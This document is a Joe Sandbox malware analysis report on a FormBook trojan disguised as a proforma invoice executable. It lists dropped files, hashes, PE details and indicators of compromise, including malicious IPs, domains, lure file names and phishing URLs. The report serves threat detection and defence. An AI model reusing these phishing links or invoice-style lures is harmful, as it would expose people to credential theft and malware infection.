                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:Proforma invoice - Arancia NZ.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/3@16/13
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 95%
                                                                                                                  • Number of executed functions: 48
                                                                                                                  • Number of non-executed functions: 274
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                  Warnings

                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                  • Execution Graph export aborted for target nfGtWoQBhJSQ.exe, PID 4580 because it is empty
                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                  • VT rate limit hit for: Proforma invoice - Arancia NZ.exe

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  09:23:59API Interceptor9667529x Sleep call for process: waitfor.exe modified

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  209.74.77.109A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.dailyfuns.info/n9b0/
                                                                                                                  W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • www.gogawithme.live/6gtt/
                                                                                                                  DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • www.futuru.xyz/8uep/
                                                                                                                  PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.greenthub.life/r3zg/
                                                                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.moviebuff.info/4r26/
                                                                                                                  PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.gogawithme.live/6gtt/
                                                                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.gogawithme.live/6gtt/
                                                                                                                  payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.gogawithme.live/6gtt/
                                                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.dailyfuns.info/n9b0/
                                                                                                                  13.248.169.48lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.avalanchefi.xyz/ctta/
                                                                                                                  BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.tals.xyz/k1td/
                                                                                                                  PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.heliopsis.xyz/69zn/
                                                                                                                  1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • www.gupiao.bet/t3a1/
                                                                                                                  Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • www.hasan.cloud/tur7/
                                                                                                                  CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.egyshare.xyz/lp5b/
                                                                                                                  attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • www.aktmarket.xyz/wb7v/
                                                                                                                  file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • www.gupiao.bet/t3a1/
                                                                                                                  DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • www.krshop.shop/grhe/
                                                                                                                  Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.a1shop.shop/5cnx/

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  www.optimismbank.xyzPAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 13.248.169.48
                                                                                                                  SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 13.248.169.48
                                                                                                                  www.bankseedz.infoPAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 46.30.211.38
                                                                                                                  www.madhf.techQuotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 103.224.182.242
                                                                                                                  BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 15.204.67.7
                                                                                                                  Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 103.224.182.242
                                                                                                                  Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 103.224.182.242
                                                                                                                  PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 103.224.182.242
                                                                                                                  Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 103.224.182.242
                                                                                                                  Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 103.224.182.242
                                                                                                                  SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 103.224.182.242
                                                                                                                  Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 103.224.182.242
                                                                                                                  r0lqcud7.nbnnn.xyzlKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 23.225.159.42
                                                                                                                  BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 27.124.4.246
                                                                                                                  specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 23.225.159.42
                                                                                                                  OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 202.79.161.151
                                                                                                                  ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 202.79.161.151
                                                                                                                  OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 27.124.4.246
                                                                                                                  REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 23.225.160.132
                                                                                                                  PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 23.225.160.132
                                                                                                                  purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 27.124.4.246
                                                                                                                  Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 202.79.161.151

                                                                                                                  ASNs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  CLOUDFLARENETUShttps://www.alessiabelltravel.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.17.25.14
                                                                                                                  l6F8Xgr0Ov.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.12.205
                                                                                                                  SPlVyHiGOz.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  https://francinecrowley.com/res444.php?4-68747470733a2f2f6a6247772e797a7675666e78632e72752f534e4e6766774f2f-#Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.11.98
                                                                                                                  55qIbHIAZi.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                  • 172.67.74.152
                                                                                                                  tEEa6j67ss.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 104.26.13.205
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 172.67.158.106
                                                                                                                  https://merchbkofin.com/Get hashmaliciousUnknownBrowse
                                                                                                                  • 172.64.153.42
                                                                                                                  Quotation.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                                                                                                  • 104.21.12.202
                                                                                                                  AMAZON-02UShttps://fn-fi.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 54.73.104.6
                                                                                                                  https://www.alessiabelltravel.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 13.226.2.26
                                                                                                                  https://management.sigmaonline.ro/newsletter_re_news.php?from_email=&abonat_id=&newsletter_id=773&followLink=http://ezp-prod1.hul.harvard.edu/login?url=https://accotoxtnation.es/mime/#Y25pY2hvbHNAZGVyaWNrZGVybWF0b2xvZ3kuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 13.227.8.72
                                                                                                                  https://secure_sharing0utlook.wesendit.com/dl/ON6fQWpNLtFc53e1u/bWlrZS5zbGVpZ2h0QGtlbXRpbGUuY28udWsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  • 3.64.82.26
                                                                                                                  https://atpscan.global.hornetsecurity.com/?d=m-jrZYNTvS7OucEG6zgopo_P-eFuotBy6khKzMMoLZ4&f=B3z_aD7k-FJHzGTgRypMC4okZ3IwSory4vTIxE3HdJ_vtmaZKtKUThjBimGO9ug0&i=&k=4AW8&m=GVQPkt_RSTiDpwD3aZUptFFr0zCshjoFLqhJ3NjtibWBkTpV22jDRnOpUHUftsT9uvGtNvEk65KPlyjsi0fzlHEgnGzER6prH6oEwQ6iGZMuyrzkW43X0VpXiLTd8OwU&n=LPqMxEbLmB_Zh1f7NoMu0JEABS3tNgPjYsrca87TqctDejHSuebypqLStQvhBN5eG43hQ2ReWbrTClyFyYZQHA&r=-0Amt46rVl0s1yn8_P2jWFIQhQ5qvzjVNyyZ7Ng6X4pWNR2O0BffN49tqRoSmkJg&s=ef9a322854c7503d3037fcbcda0a6c433cee94d107fe0a8ab1fda12b2f14509b&u=https%3A%2F%2Fsecure_sharing0utlook.wesendit.com%2Fdl%2FON6fQWpNLtFc53e1u%2FbWlrZS5zbGVpZ2h0QGtlbXRpbGUuY28udWsGet hashmaliciousUnknownBrowse
                                                                                                                  • 3.64.82.26
                                                                                                                  https://bielefelde.de/Get hashmaliciousUnknownBrowse
                                                                                                                  • 108.158.75.57
                                                                                                                  http://idiomas.astalaweb.com/otros/Portugu%C3%A9s/Comunicacion-verbos-en-portugues.aspGet hashmaliciousUnknownBrowse
                                                                                                                  • 52.11.244.148
                                                                                                                  http://espanyol-hjfcghmvhjvmhcdhxtxhsallkkkjjggdsd.static.hf.spaceGet hashmaliciousUnknownBrowse
                                                                                                                  • 13.227.2.22
                                                                                                                  lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 13.248.169.48
                                                                                                                  sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                  • 54.171.230.55
                                                                                                                  MULTIBAND-NEWHOPEUSQuotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 209.74.77.107
                                                                                                                  specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 209.74.64.187
                                                                                                                  Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 209.74.77.108
                                                                                                                  specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 209.74.77.107
                                                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 209.74.77.109
                                                                                                                  OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 209.74.77.107
                                                                                                                  CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 209.74.77.108
                                                                                                                  ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 209.74.77.107
                                                                                                                  Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                  • 209.74.77.108
                                                                                                                  OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 209.74.77.107

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Temp\FxK39HI69

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\waitfor.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):196608
                                                                                                                  Entropy (8bit):1.121297215059106
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                  Malicious:false
                                                                                                                  Reputation:high, very likely benign file
                                                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\aut4E08.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):290304
                                                                                                                  Entropy (8bit):7.992296918729059
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:6144:N3ZHBk+srqXwAQoWbCGYdBrnjVif6glb6oIfU0kZtBjDNQgAZGNQQY:NJHbJgAwbMB7ZifHl2RuZbNn5NJY
                                                                                                                  MD5:8CA8A4520B2F37B13D944F19071AEC67
                                                                                                                  SHA1:4D01CE528208C32E72DEE5B568F23F1B6B47FDD8
                                                                                                                  SHA-256:699FCD72FA754813C7D5BD87F1854D81E13B45535885D6865CDC093835F0B81E
                                                                                                                  SHA-512:482E3EC97ECE219EF619697D16C1660874C653B25266396A0CA52C2816B52B934CE839535330DDB43708F42BBB8BB31163E6621677611DB2C4921DAF043BDFE4
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:xn.FBO2ABVHA..65.JFAO2AF.HAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ6.4JFOP.OF.A.w.7y.k.)&Aa6$'&$0[.W+(/ Fa$3h3#?.\Zj....,)2-o[\<.4JFAO2A?WA.k1Q..*!.rR&.L..kVR.P...!!.R....US..(,Z|&1.AVQ654JF..2A.WIA..ti4JFAO2AF.HCWZ7>4J.EO2AFVHAVQ.!4JFQO2A6RHAV.65$JFAM2A@VHAVQ652JFAO2AFV8EVQ454JFAO0A..HAFQ6%4JFA_2AVVHAVQ6%4JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAx%SM@JFA.iEFVXAVQj14JVAO2AFVHAVQ654JfAORAFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFV

                                                                                                                  C:\Users\user\AppData\Local\Temp\iodization

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):290304
                                                                                                                  Entropy (8bit):7.992296918729059
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:6144:N3ZHBk+srqXwAQoWbCGYdBrnjVif6glb6oIfU0kZtBjDNQgAZGNQQY:NJHbJgAwbMB7ZifHl2RuZbNn5NJY
                                                                                                                  MD5:8CA8A4520B2F37B13D944F19071AEC67
                                                                                                                  SHA1:4D01CE528208C32E72DEE5B568F23F1B6B47FDD8
                                                                                                                  SHA-256:699FCD72FA754813C7D5BD87F1854D81E13B45535885D6865CDC093835F0B81E
                                                                                                                  SHA-512:482E3EC97ECE219EF619697D16C1660874C653B25266396A0CA52C2816B52B934CE839535330DDB43708F42BBB8BB31163E6621677611DB2C4921DAF043BDFE4
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:xn.FBO2ABVHA..65.JFAO2AF.HAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ6.4JFOP.OF.A.w.7y.k.)&Aa6$'&$0[.W+(/ Fa$3h3#?.\Zj....,)2-o[\<.4JFAO2A?WA.k1Q..*!.rR&.L..kVR.P...!!.R....US..(,Z|&1.AVQ654JF..2A.WIA..ti4JFAO2AF.HCWZ7>4J.EO2AFVHAVQ.!4JFQO2A6RHAV.65$JFAM2A@VHAVQ652JFAO2AFV8EVQ454JFAO0A..HAFQ6%4JFA_2AVVHAVQ6%4JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAx%SM@JFA.iEFVXAVQj14JVAO2AFVHAVQ654JfAORAFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFVHAVQ654JFAO2AFV

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.189673969750801
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:Proforma invoice - Arancia NZ.exe
                                                                                                                  File size:1'207'808 bytes
                                                                                                                  MD5:a4c3a56e6258ea94065bf7151009d43c
                                                                                                                  SHA1:c4d4d96374381d46051521ff82d3bf9bfb405c38
                                                                                                                  SHA256:87e59a4758499e2544872d9ad64c561b1fc62290c4420fd9caca07f0e6e830aa
                                                                                                                  SHA512:690ccebe51b2285d3a74a33b76eb89de615896a3ea1649749858d6b54fa90c5f803ec7bcb525d2e952db0d6a31fe4ea2193e375007acbfe5b8587342c36f1c0f
                                                                                                                  SSDEEP:24576:Lu6J33O0c+JY5UZ+XC0kGso6Fa58SiZoZuGbcA6VKdGmWY:lu0c++OCvkGs9Fa58HKu8cAZdmY
                                                                                                                  TLSH:D245CF2273DDC361CB669173BF6AB7016EBF3C614630B85B2F980D7DA950161162CBA3
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                                                  File Icon

                                                                                                                  Icon Hash:aaf3e3e3938382a0

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x427dcd
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x674CF56D [Sun Dec 1 23:46:53 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  call 00007F0D5D1C1BAAh
                                                                                                                  jmp 00007F0D5D1B4974h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push edi
                                                                                                                  push esi
                                                                                                                  mov esi, dword ptr [esp+10h]
                                                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                                                  mov eax, ecx
                                                                                                                  mov edx, ecx
                                                                                                                  add eax, esi
                                                                                                                  cmp edi, esi
                                                                                                                  jbe 00007F0D5D1B4AFAh
                                                                                                                  cmp edi, eax
                                                                                                                  jc 00007F0D5D1B4E5Eh
                                                                                                                  bt dword ptr [004C31FCh], 01h
                                                                                                                  jnc 00007F0D5D1B4AF9h
                                                                                                                  rep movsb
                                                                                                                  jmp 00007F0D5D1B4E0Ch
                                                                                                                  cmp ecx, 00000080h
                                                                                                                  jc 00007F0D5D1B4CC4h
                                                                                                                  mov eax, edi
                                                                                                                  xor eax, esi
                                                                                                                  test eax, 0000000Fh
                                                                                                                  jne 00007F0D5D1B4B00h
                                                                                                                  bt dword ptr [004BE324h], 01h
                                                                                                                  jc 00007F0D5D1B4FD0h
                                                                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                                                                  jnc 00007F0D5D1B4C9Dh
                                                                                                                  test edi, 00000003h
                                                                                                                  jne 00007F0D5D1B4CAEh
                                                                                                                  test esi, 00000003h
                                                                                                                  jne 00007F0D5D1B4C8Dh
                                                                                                                  bt edi, 02h
                                                                                                                  jnc 00007F0D5D1B4AFFh
                                                                                                                  mov eax, dword ptr [esi]
                                                                                                                  sub ecx, 04h
                                                                                                                  lea esi, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [edi], eax
                                                                                                                  lea edi, dword ptr [edi+04h]
                                                                                                                  bt edi, 03h
                                                                                                                  jnc 00007F0D5D1B4B03h
                                                                                                                  movq xmm1, qword ptr [esi]
                                                                                                                  sub ecx, 08h
                                                                                                                  lea esi, dword ptr [esi+08h]
                                                                                                                  movq qword ptr [edi], xmm1
                                                                                                                  lea edi, dword ptr [edi+08h]
                                                                                                                  test esi, 00000007h
                                                                                                                  je 00007F0D5D1B4B55h
                                                                                                                  bt esi, 03h
                                                                                                                  jnc 00007F0D5D1B4BA8h

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [ASM] VS2013 build 21005
                                                                                                                  • [ C ] VS2013 build 21005
                                                                                                                  • [C++] VS2013 build 21005
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                                                                  • [RES] VS2013 build 21005
                                                                                                                  • [LNK] VS2013 UPD4 build 31101

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5e508.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1260000x711c.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0xc70000x5e5080x5e60057c459ecdaa3658fa2b8ecbc13cf14f2False0.930404076986755data7.89991585410463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x1260000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                  RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                  RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                  RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                  RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                  RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                  RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                  RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                  RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                  RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
